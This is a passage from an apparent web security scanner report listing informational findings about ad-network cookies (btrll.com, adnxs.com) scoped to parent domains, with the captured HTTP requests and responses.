Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:14:22 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:22 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/mid;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.16. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]]

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]] HTTP/1.1
Host: brxserv.btrll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:40:04 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:04 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/mid;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.17. http://ib.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11d765b6a10b1b3&seg_code=cm.cm_aa_gn1,cm.weath_l&ord=1295482372 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTdEnffCdHa[IfI1^wzHPZ2[uFgkr]/35(zkfLWZZy77B(fakx9WCYA*.cx3xndWdV[eGG4Y!<mnI+C=f?; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Thu, 20 Jan 2011 00:13:36 GMT

GIF89a.............!.......,........@..L..;

7.18. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:12:52 GMT
Content-Length: 402

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=c
...[SNIP]...

7.19. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-69155988_1295482815%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D777061%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D1768089178%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb35548=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb727727=5_[r^kI/7ZrO@Pn0nf8M9a:9p?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP5cuKdiuIR8PBWHfHSmrEEIHgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA-AUBAgUCAAUAAAAAbSD3AAAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483399%29%3Buf%28%27r%27%2C+151608%2C+1295483399%29%3Bppv%2882%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2884%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2811%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2882%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2884%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2887%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28619%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28620%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28621%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wI`We*m2)^fn_u4.+o#pbc^I%Bp(GQ'kk7r2?fI0; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:29:59 GMT
Content-Length: 439

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-69155988_1295482815,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sports_l-cm.weath_l;;cmw=owl;sz=
...[SNIP]...

7.20. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D881330%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_l%3Bord%3D3751955344%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:20:17 GMT
Content-Length: 440

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;;cmw=owl;sz=
...[SNIP]...

7.21. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D881330%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_l%3Bord%3D3751955344%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
